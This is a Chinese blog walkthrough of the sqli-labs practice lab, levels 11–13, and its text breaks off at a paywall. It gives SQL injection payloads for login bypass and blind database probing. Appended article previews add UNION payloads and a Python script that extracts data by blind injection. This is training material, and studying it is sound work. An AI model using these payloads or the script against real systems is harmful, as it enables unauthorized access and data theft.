sqli-labs:Less-11-Less-20

最新推荐文章于 2024-12-07 22:47:31 发布
原创 最新推荐文章于 2024-12-07 22:47:31 发布 · 735 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了SQL注入实战中的POST型注入,从Less-11到Less-20,涵盖单引号、双引号、双注入、盲注等多种类型。通过示例展示了如何利用错误信息、永真表达式、时间延迟等方法进行注入,同时也探讨了注入点的定位和数据库信息的获取。

Less-11~Less-20是post型注入,一般都是登陆绕过,当然也是可以获取数据库的信息。

工具

火狐+burpsuite/hackbar插件

less 11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)

我们把 整个被单引号引着的复制下来
把左端和右端的单引号去掉,就变成下面的
test’ LIMIT 0,1 test右边有个单引号
那么判断是单引号注入了
直接来个永真的,加注释,登陆成功
uname=1' or 1=1#&passwd=1&submit=Submit
在这里插入图片描述
尝试以下payload,失败了
在这里插入图片描述
uname=test' or 1=1 & passwd=test&submit=Submit
首先and的优先级高于or 【就是and先运算】

那么 ‘1’=‘1’ and password=‘test’ 先运算,因为users表里面的password字段没有一个数据时test,右边是false,那么整个表达式就是false
那么语句就变成 SELECT username, password FROM users WHERE username='test' or false
username='test'没有这一行数据吧,右边是false,or也救不了你了
uname这里不行,我们尝试passwd咯,发现是可以的
在这里插入图片描述
uname=test&passwd=test' or '1'='1&submit=Submit
首先and先运算

username=‘test’ and password=‘test’ 返回false(0)

‘1’=‘1’ 肯定是true(1)了

最终语句等价于

SELECT username, password FROM users WHERE 0 or 1;

那么就肯定可以绕过登陆了

那么总结一下:一般第一个登陆字段(一般是用户名)就用注释,第二个登陆字段(一般就密码)用闭合和注释都是可以的

此外,我们这里还可以通过盲注获取数据库信息
uname=11&passwd=1' or length(database())=7 # &submit=Submit
在这里插入图片描述uname=11&passwd=1' or length(database())=8 # &submit=Submit
在这里插入图片描述

less 12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)

先用什么单引号双引号看看,报错就看出它有没有用引号,或者加了其他东西
单引号
在这里插入图片描述双引号
在这里插入图片描述那么这里明显看出用)将变量括着,那么直接绕过
uname=11&passwd=1") or 1=1 # &submit=Submit
在这里插入图片描述

less 13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

在这里插入图片描述单引号看出有),直接永真

最低0.47元/天 解锁文章
sql-labs 11-20
m0_46143427的博客
02-03 857
Sql11-20 Less-11 首先在输入框里随便输入账号密码,可以看到URL里无任何变化,所以这关是POST传递了。 但是不管是怎么传递的,数据在传输到后台的处理是相同的,后台sql语句照样可以被我们修改。 我们先输账号为:admin'密码为:123可以看到 123被单引号括住,说明是单引号闭合型。 接下来输入账号为:admin'#,密码为:123可以看到,页面显示 正确进入,而且还有两个显...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1991
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
SQLI-LAB  的 实战记录(Less 11 - Less 20)
这块盾牌有待改良
07-15 4583
Less - 11 Error Based- String Less - 12 Error Based- Double quotes- String Less - 13 Double Injection- String- with twist
sqli-labs————less 20
Fly_鹏程万里
05-12 1852
Less-20这里做一个简单的测试:username:adminpassword:aaa从上面的显示结果中,我们看到了user-agent、COOKIE的内容,我们这里查看一下源代码看看,到底是怎么回事:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD...
sqli-labs-master通关之LESS20-LESS25
weixin_43726831的博客
10-09 952
SQL注入之sqli-labs-master LESS-2020关 POST交互方式下的cookie字段注入 第20关正确的回显页面如下图所示 从图中可以看出这一关是与cookie有关,正确的页面进入后,只有一个按钮Delete your cookie! cookie是客户端记录的会话信息,session记录服务器端的会话信息,此时客户端已经记录了与服务器端交互的会话内容,由此可推断出,注入...
sql注入之sqli-labs(less11-less20)
小宇的web博客
03-17 919
sql注入之sqli-labs(less11-less20)特详解 less11 1.输入用户名和密码admin和admin查看输出 2.利用burpsuite来进行抓包(这个抓包软件需要java环境自行配置和下载直接度娘,burp下载后还需要自行把火狐浏览器的代理服务器配置)。 3.打开burpsuite来进行抓包(uname=admin&passwd=admin&submit=Submit这个就是抓包的数据) 4.将这个数据复制后打开火狐浏览器,复制到指定的位置。(这时必须关闭bu
sqlilabs靶场:less-11--less-15
2302_80256359的博客
12-07 908
sqlilabs靶场第11关到第15关通关超详细步骤
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2531
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqlilabs靶场:less-6--less-10
2302_80256359的博客
12-05 1097
那么我们可以考虑"绝招"---》延时注入 ,其利⽤条件较为苛刻,这种情况我们可以利用时间函数来判断数据有没有在⽬标数据中得到执行,当然也需要构造闭合......最后得出四张表的名称分别为emails,referers,uagents,users。得知数据表的三个字段分别为id,username,password。通过BP抓包得知四个数据表的表名长度分别为6,8,7,5。通过时间注入得知四张表的长度分别为6,8,7,5。通过BP爆破得知三个字段的长度分别为2,8,8。
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 1196
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs ————less -11(POST注入)
Fly_鹏程万里
05-11 4457
前言从这一关开始,我们就进入到了POST注入的世界了。在接下来的几关中我们将陆续介绍关于POST注入的方法以及技巧。POSTpost是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如,我们常常使用的用户登录模块、网站的留言板模块等,在这些功能模块中我们提交的数据都是以post的方式提交的服务器的,之后再由服务器端进行验证。Less-11关卡界面:我们首先提交一个admin试试看会有什么...
sqli-labs (less-11)
kukudeshuo的博客
03-09 3732
sqli-labs (less-11) 补充知识 从第11关开始我们发现跟以前的页面已经完全不一样了,这里要我们输入用户名和密码 假设我们现在注册了一个账号,账号为admin,密码为admin,我们登入进去看看 登入进去之后我们发现屏幕上回显了我们输入的账号和密码,但是url那里却没有返回我们输入的账号和密码,因为前面的关卡我们输入的内容都是以GET方式传输到了服务端,而这里我们输入的账号密码是以POST的方法传输到了服务端 GET请求和POST请求的区别 GET请求: GET方法用于获取请求页面的指定
sqli-labs less-11
爱党人士
06-15 888
1-10就是get,这个是post,会post就肯定会get的啦。 实验环境: firefox hackbar(这个是另一个版本,因为最多人用的那个版本要收费了) less 11: 随便输点东西 url栏没有什么变化, 肯定是post,用hackbar。 快速查看元素技巧: uname和passwd(这个在username右边的编辑框右键查看元素即可看到) 不出所料, 下面就是要对其进行判...
sqli-labs less11-16
sopora的博客
10-09 331
LESS 11 基于字符串的注入(POST) 在username栏输入单引号’测试,结果: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’’’ and passwo...
SQLi-Labs Less11-Less16
KRDecad3的博客
12-05 404
Less-11-POST-Error Based-Single quotes-String username栏输入一个单引号报错: 说明查询语句有username='$_POST[username]' and password='$_POST[password]',查询有两个字段 username栏输入 ' or 1=1# 提交,绕过登陆验证,并且知道两处可以回显。 构造查询数据库名: '...
Sqli-labsLess-20Less-21和Less-22
m0_46315342的博客
06-04 498
                                          &nbs...
SQLi-Labs 学习笔记(Less 11-20
Onlyme的博客
03-11 1263
点击打开链接Less-11 基于错误的POST型单引号字符型注入①先打开网页查看 Welcome Dhakkan②查看源代码:[php] view plain copy<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transition...
SQLI-LABS Less-11Less-12
Web学习之路
03-22 386
联合注入
sqli-labs (less-20)
kukudeshuo的博客
03-11 397
sqli-labs (less-20) 进入20关,输入用户名和密码后,屏幕回显了我们的USER AGENT、IP地址、cookie信息 通过回显的为cookie信息我们猜测这关注入点很有可能在cookie里,题目提示也告诉我们为cookie注入 这里我们利用火狐的一个小工具来抓取cookie的信息,这个工具的名字为Cookies Manager +,我们打开来查看当前页面的cookie信息 我们输入’试试 屏幕回显报错 根据报错信息判断闭合方式为’#,并且为字符型注入 判断字段长度 判断字段
sqli-labs- less7
最新发布
12-28
### SQLi-7 教程与解决方案 #### 背景介绍 SQL注入是一种常见的攻击方式,通过向应用程序输入恶意的SQL语句来操纵数据库查询。SQLi-Labs 是一个用于练习和学习SQL注入技术的平台。 #### Less-7 特点分析 Less-7 主要关注基于布尔盲注(Boolean-based Blind Injection)的技术[^1]。这种类型的注入不依赖于错误消息返回具体的信息,而是利用条件判断来推断数据的存在与否。 #### 实验环境搭建 为了进行实验,确保已经安装并配置好了PHP服务器以及MySQL数据库,并且成功部署了SQLi-Labs项目文件夹下的`/sqli/Less-7/`目录中的脚本[^2]。 #### 测试用例准备 访问目标URL `http://localhost/sqli-labs/Less-7/?id=` 并尝试不同的参数值来进行测试。对于布尔盲注来说,通常会构造一些能够引起不同页面响应的行为模式作为基础: - 正常情况:当ID存在时显示正常的内容; - 错误情况:如果不存在对应的记录,则可能给出空白页或其他提示信息; #### 注入点发现 在Less-7中,`id` 参数是一个潜在的注入点。可以先验证是否存在SQL注入漏洞,比如发送请求 `http://localhost/sqli-labs/Less-7/?id=1' AND '1'='1` 和 `http://localhost/sqli-labs/Less-7/?id=1' AND '1'='2` 来观察是否有区别性的反应。 #### 数据库版本探测实例 一旦确认了注入的可能性之后,就可以进一步探索更多细节。例如获取当前使用的 MySQL 版本号可以通过如下方法实现: ```sql http://localhost/sqli-labs/Less-7/?id=-1 UNION SELECT @@version -- ``` 此命令将会把 `-1` 替换成实际存在的 ID 值加上联合选择操作符 (`UNION`) ,从而执行第二个查询并将结果集附加到原始查询的结果集中展示出来。 #### 字符串长度枚举技巧 假设想要知道管理员用户名的具体字符数,那么可以根据ASCII码表逐位猜测直到找到匹配为止。下面是一段Python代码片段用来自动化这个过程: ```python import requests url = "http://localhost/sqli-labs/Less-7/" payload_true = "?id=1' AND ASCII(SUBSTRING((SELECT user FROM users LIMIT 0,1),{},1))={}--" payload_false = "?id=1' AND ASCII(SUBSTRING((SELECT user FROM users LIMIT 0,1),{},1))!={}--" for i in range(1, 20): for j in range(32, 128): r = requests.get(url + payload_true.format(i,j)) if "You are in" in r.text: print(chr(j), end='') break print() ``` 这段程序将依次遍历每一个位置上的字母直至整个字符串被还原完毕。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值